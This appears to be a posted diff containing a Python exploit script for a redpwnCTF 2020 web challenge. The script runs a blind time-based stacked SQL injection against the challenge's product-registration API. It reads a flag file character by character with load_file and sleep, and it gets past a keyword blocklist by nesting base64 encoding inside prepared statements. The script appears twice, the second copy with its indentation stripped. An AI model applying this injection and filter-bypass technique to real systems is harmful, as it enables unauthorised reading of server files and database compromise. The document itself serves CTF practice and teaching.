parrot409 · June 27, 2020 04:16
diff --git a/redpwn2020_unintended_got_stacks.py b/redpwn2020_unintended_got_stacks.py
 #!/usr/bin/env python3
 #Written by 0xParrot
 #This is unintended solution.
 import requests
 import string
 import base64
 import random
 import json
 import time
 flag = ""
 while(True):
    for i in string.ascii_lowercase + "{}" + string.ascii_uppercase + "_$&*+-=" :
        url = "https://got-stacks.2020.redpwnc.tf/api/registerproduct"
        payload = "select if((select substr(load_file('/home/ctf/flag.txt'),%d,1)) like binary '%s',sleep(6),1)" % (len(flag)+1,i)
        blocked = ["union","and","or","sleep","hex","char","db","/","*","load_file","0x","fl","ag","txt","if"]
        timesEncoded = 0
        while(any(x in payload for x in blocked)):
            payload = base64.b64encode(bytes(payload,"ASCII")).decode("ASCII")
            timesEncoded += 1
        payload = "'" + payload + "'"
        payload = "from_base64(" * timesEncoded + payload + (")" * timesEncoded)
        payload = "sf'); set @s=(select %s);PREPARE stmt3 FROM @s;EXECUTE stmt3;INSERT INTO stock (stockid,name,quantity,vurl) VALUES (116643,'aaa',0,'af');#" % payload
        stockid = str(random.randint(0,100000000))
        stamp = time.time()
        r = requests.post(url,json={"stockid" : stockid,"name" : "ff","quantity":"0","vurl":payload}).text
        if("exists" in r):
            stockid = str(random.randint(0,100000000))
            stamp = time.time()
            r = requests.post(url,json={"stockid" : stockid,"name" : "ff","quantity":"0","vurl":payload})
        stamp = time.time() - stamp
        if(stamp > 5):
            flag += i
            print("[+] FLAG: "+flag)
            break
        else:
            print("[*] Tested: "+i)
	#!/usr/bin/env python3
	#Written by 0xParrot
	#This is unintended solution.
	import requests
	import string
	import base64
	import random
	import json
	import time
	flag = ""
	while(True):
	for i in string.ascii_lowercase + "{}" + string.ascii_uppercase + "_$&*+-=" :
	url = "https://got-stacks.2020.redpwnc.tf/api/registerproduct"
	payload = "select if((select substr(load_file('/home/ctf/flag.txt'),%d,1)) like binary '%s',sleep(6),1)" % (len(flag)+1,i)
	blocked = ["union","and","or","sleep","hex","char","db","/","*","load_file","0x","fl","ag","txt","if"]
	timesEncoded = 0
	while(any(x in payload for x in blocked)):
	payload = base64.b64encode(bytes(payload,"ASCII")).decode("ASCII")
	timesEncoded += 1
	payload = "'" + payload + "'"
	payload = "from_base64(" * timesEncoded + payload + (")" * timesEncoded)
	payload = "sf'); set @s=(select %s);PREPARE stmt3 FROM @s;EXECUTE stmt3;INSERT INTO stock (stockid,name,quantity,vurl) VALUES (116643,'aaa',0,'af');#" % payload
	stockid = str(random.randint(0,100000000))
	stamp = time.time()
	r = requests.post(url,json={"stockid" : stockid,"name" : "ff","quantity":"0","vurl":payload}).text
	if("exists" in r):
	stockid = str(random.randint(0,100000000))
	stamp = time.time()
	r = requests.post(url,json={"stockid" : stockid,"name" : "ff","quantity":"0","vurl":payload})
	stamp = time.time() - stamp
	if(stamp > 5):
	flag += i
	print("[+] FLAG: "+flag)
	break
	else:
	print("[*] Tested: "+i)